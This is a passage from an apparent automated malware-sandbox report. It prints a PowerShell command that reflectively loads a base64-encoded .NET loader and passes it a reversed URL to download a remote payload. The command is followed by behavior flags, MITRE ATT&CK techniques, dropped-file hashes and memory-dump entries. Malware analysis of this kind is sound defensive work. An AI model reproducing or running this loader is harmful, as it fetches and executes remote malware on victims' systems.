hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGU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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAABDsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';[Byte[]] $HWqMQ = [System.Convert]::FromBase64String( $pICwv );[System.AppDomain]::CurrentDomain.Load($HWqMQ).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('WG8b/war/edoc/oi.slootw//:sptth'))"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
690c853f37a280ec104526b676af97ea

SHA1
9e72259681bbc0422f073c077347ed972a7c88a1

SHA256
d972cc505e7b0f85b202d4543364d74e6fe0802111b3705ef748e141d64bb32b

SHA512
373bb78fb0c20a6bd412628da505bd1810c057f50b31bd8f386c82a92bc756925d5c94393ae65f357aba095238d62e9654cdebabb34a8b282b9e24211d3d6c9e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
1a1abc3ad84b8af884c564ef40bb4be9

SHA1
49adf8841c29f2655e715c81e1b8222883e402a8

SHA256
d9871ad16583475803f28bd87c576bf553ac73cec460bf2a935a1e0a15038eb6

SHA512
8ef95904ec8d082dec1e95c782e8d7084d97d72e415de99c69a4f990cb55dbdd56de4abbe2ddfcc431975c088065a1002a51827a38f80127fa33abf058a94522

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
b1220b8b5b2c6b50b73269d355fe605f

SHA1
6d6fbef7d0b5ec19c77b59a1bb3d9bd8fcb751ba

SHA256
c2a0c09ab512295931372347dfbe53bf520fc665141edfa7ac21b7434ad68a82

SHA512
62e9c17ba2198bb5fbfb38dba400128af7e217dd0d0f35f527687d0fe32b81029af570185c5818450fc4caf0c0dea30a6763daac7682b5e2f32abe77ed404ebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\x.vbs
MD5
4916ad516a9d0b5c95d80f2a16a3d114

SHA1
6fe3287ffb508a11805070c8600717a8dd567b15

SHA256
82c9d74c9a8688ed1fffd53e3b8ffaf9ae8f85a843f34412d15f88b18ce134a9

SHA512
197c5cdfc3f8511808e9126cecf657c35bf601cced8df15317733b3e5147ee282981f04113e3b6abcd1e4e0b2b8d440812beb5763b0a775d9e87a41dbd37d2fa

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
5db384281bc038c0722a3f2deae9176c

SHA1
5f0d4bf6bb90c221b395e64c07d2e9fa84c60e09

SHA256
7e4aa3a3dfc33c4bf6d7738bd10f3d76e4a4499a0fed61ca4b8bbab8c9b2f2db

SHA512
c7e6bd8843f55537ab8b8ee98f9d87392eb7bf84379d6f8ab4aa71655669752e537bd141649652ea140e8029ec83cc2f3acb80e47375f006964e6ee66b596129

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
5db384281bc038c0722a3f2deae9176c

SHA1
5f0d4bf6bb90c221b395e64c07d2e9fa84c60e09

SHA256
7e4aa3a3dfc33c4bf6d7738bd10f3d76e4a4499a0fed61ca4b8bbab8c9b2f2db

SHA512
c7e6bd8843f55537ab8b8ee98f9d87392eb7bf84379d6f8ab4aa71655669752e537bd141649652ea140e8029ec83cc2f3acb80e47375f006964e6ee66b596129

Download Submit
memory/952-65-0x0000000000000000-mapping.dmp

Download
memory/1304-74-0x0000000000000000-mapping.dmp

Download
memory/1304-80-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1304-79-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1304-82-0x00000000023B0000-0x0000000002FFA000-memory.dmp

Filesize
12.3MB

Download
memory/1524-64-0x0000000000000000-mapping.dmp

Download
memory/1552-77-0x0000000000000000-mapping.dmp

Download
memory/1612-67-0x0000000000000000-mapping.dmp

Download
memory/1640-54-0x00000000748A1000-0x00000000748A5000-memory.dmp

Filesize
16KB

Download
memory/1640-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1640-60-0x0000000005850000-0x0000000005852000-memory.dmp

Filesize
8KB

Download
memory/1640-58-0x0000000075531000-0x0000000075533000-memory.dmp

Filesize
8KB

Download
memory/1640-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1640-55-0x00000000718D1000-0x00000000718D3000-memory.dmp

Filesize
8KB

Download
memory/1688-70-0x0000000002510000-0x000000000315A000-memory.dmp

Filesize
12.3MB

Download
memory/1688-68-0x0000000000000000-mapping.dmp

Download
memory/1812-59-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp

Filesize
8KB

Download
memory/1812-57-0x0000000000000000-mapping.dmp

Download
memory/1992-61-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads